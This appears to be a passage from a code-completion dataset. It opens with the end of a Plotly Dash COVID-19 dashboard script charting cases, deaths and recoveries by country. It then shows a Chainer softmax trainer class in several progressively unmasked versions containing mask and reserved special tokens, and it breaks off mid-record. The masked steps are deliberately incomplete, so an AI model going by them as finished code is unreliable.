deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno)\r\n\r\n fig_global={'data':fig100, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\r\n figmort = []\r\n anno =[]\r\n\r\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\r\n m = m.sort_values(by=['Mortality_Percent'], ascending=True).reset_index()\r\n\r\n for i in range(len(m)):\r\n\r\n m1 = m.loc[i, 'Country_Region']\r\n #m1 = [str(i) for i in m1]\r\n m2 = m.loc[i, 'Mortality_Percent']\r\n #m2 = [str(round(i, 2)) for i in m2]\r\n trace = go.Bar(name='Observed Case - Mortality Ratio',\r\n x = [m2],\r\n y= [m1],\r\n text = [round(m.loc[i, 'Mortality_Percent'], 2)],\r\n orientation ='h',\r\n textposition='auto',\r\n marker = dict(color='#FFB000', opacity=0.6, line=dict(color='rgba(255,176,0, 1)', width=1)),\r\n hovertemplate='<b>%{y}</b><br>'+'<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\r\n showlegend=False)\r\n\r\n figmort.append(trace)\r\n\r\n layout_global = go.Layout(yaxis={'title':'Country / Region','fixedrange':True, 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Observed Case - Mortality Ratio',\r\n xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [0, m['Mortality_Percent'].max() + 2], 'fixedrange':True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=750, hovermode='closest')\r\n fig_global={'data':figmort, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n elif select_global == 'Recoveries vs. Deaths By Country':\r\n figscat = []\r\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >=100)].reset_index()\r\n\r\n for i in range(len(rc)):\r\n scat = go.Scatter(\r\n x=[rc.loc[i, 'Deaths']],\r\n y=[rc.loc[i, 'Recovered']],\r\n mode='markers+text',\r\n text=[rc.loc[i, 'Country_Region']],\r\n marker_color=(colors_dict_global[rc.loc[i, 'Continent']]),\r\n showlegend=False,\r\n marker=dict(size=12,line_width=1, opacity=0.75),\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Recoveries: %{y}<br>'+'Deaths: %{x}<br>',\r\n textposition='bottom center',\r\n textfont=dict(size=10, color='rgba(0, 0, 0, 0.6)')\r\n )\r\n\r\n figscat.append(scat)\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='Deaths = Recoveries',\r\n opacity=.25,\r\n line = dict(color='grey', width=1),\r\n text=['# of Deaths = # of Recoveries'],\r\n hovertemplate='<b># of Deaths = # of Recoveries</b>',\r\n showlegend=True))\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i*2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='2 Recoveries for Every Death',\r\n opacity=.25,\r\n line = dict(color='green', width=3, dash='dash'),\r\n text=['2 Recoveries for Every Death'],\r\n hovertemplate='<b>2 Recoveries for Every Death</b>',\r\n showlegend=True))\r\n\r\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)),\r\n y = [i/2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))],\r\n mode='lines',\r\n name='2 Deaths for Every Recovery',\r\n opacity=.25,\r\n line = dict(color='firebrick', width=3, dash='dash'),\r\n text=['2 Deaths for Every Recovery'],\r\n hovertemplate='<b>2 Deaths for Every Recovery</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Recoveries','fixedrange':True, 'automargin': True, 'range':[np.log10(100), np.log10(rc['Recovered'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Recoveries vs. Deaths, By Country',\r\n xaxis={'title': 'Number of Deaths','fixedrange':True, 'range':[np.log10(100), np.log10(rc['Deaths'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, height=750, hovermode='closest')\r\n\r\n fig_global={'data':figscat, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='main-dropdown-2', component_property = 'options'),\r\n Output(component_id='btext1', component_property='children'),\r\n Output(component_id='subplot1', component_property = 'figure'),\r\n Output(component_id='btext2', component_property='children'),\r\n Output(component_id='subplot2', component_property = 'figure'),\r\n Output(component_id='btext3', component_property='children'),\r\n Output(component_id='subplot3', component_property = 'figure')],\r\n [Input(component_id='main-dropdown', component_property = 'value')])\r\n\r\ndef update_country(selected_country):\r\n\r\n if selected_country is None:\r\n selected_country = 'Canada'\r\n\r\n options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases']\r\n\r\n vals = [{'label': i, 'value': i} for i in options]\r\n\r\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))]\r\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))]\r\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))]\r\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3}\r\n \r\n\r\n else:\r\n options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases']\r\n\r\n vals = [{'label': i, 'value': i} for i in options]\r\n\r\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))]\r\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))]\r\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))]\r\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3}\r\n\r\n\r\n\r\n@app.callback(\r\n Output(component_id='box-1',component_property='figure'),\r\n [Input(component_id='main-dropdown', component_property = 'value'),\r\n Input(component_id='main-dropdown-2', component_property = 'value')])\r\n\r\ndef update_maingraph(selected_country, selected_graph):\r\n if selected_graph is None and selected_country is None:\r\n\r\n selected_country = 'Canada'\r\n\r\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19: {0}'.format(str(selected_country)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n elif selected_graph is None and selected_country is not None:\r\n\r\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19: {0}'.format(str(selected_country)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n elif selected_graph == 'Total and Daily Confirmed Cases':\r\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], line=dict(color='#1A85FF', width = 1.5), mode='lines'),\r\n go.Scatter(name='Daily Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'], line=dict(color='#D41159', width = 3), mode='lines', fill='tozeroy')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)),\r\n hovermode='x unified', xaxis=dict(title='Date',fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n else:\r\n cols_dict = {'Confirmed':'#648FFF', 'Deaths':'#DC267F', 'Recovered':'#009E73'}\r\n\r\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph], marker_color=cols_dict[selected_graph])]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
<|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data <|reserved_special_token_1|> import chainer.links as L import chainer.functions as F from chainer import optimizer, optimizers, training, iterators from chainer.training import extensions from chainer.datasets import tuple_dataset class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data <|reserved_special_token_1|> # -*- coding: utf-8 -*- import chainer.links as L import chainer.functions as F from chainer import optimizer, optimizers, training, iterators from chainer.training import extensions from chainer.datasets import tuple_dataset class SoftMaxTrainer(): def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == "Adam": opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data
flexible
{ "blob_id": "474700968e563d34d6a0296ec62950e2e71fe1b0", "index": 1671, "step-1": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n <mask token>\n", "step-3": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-4": "import chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n 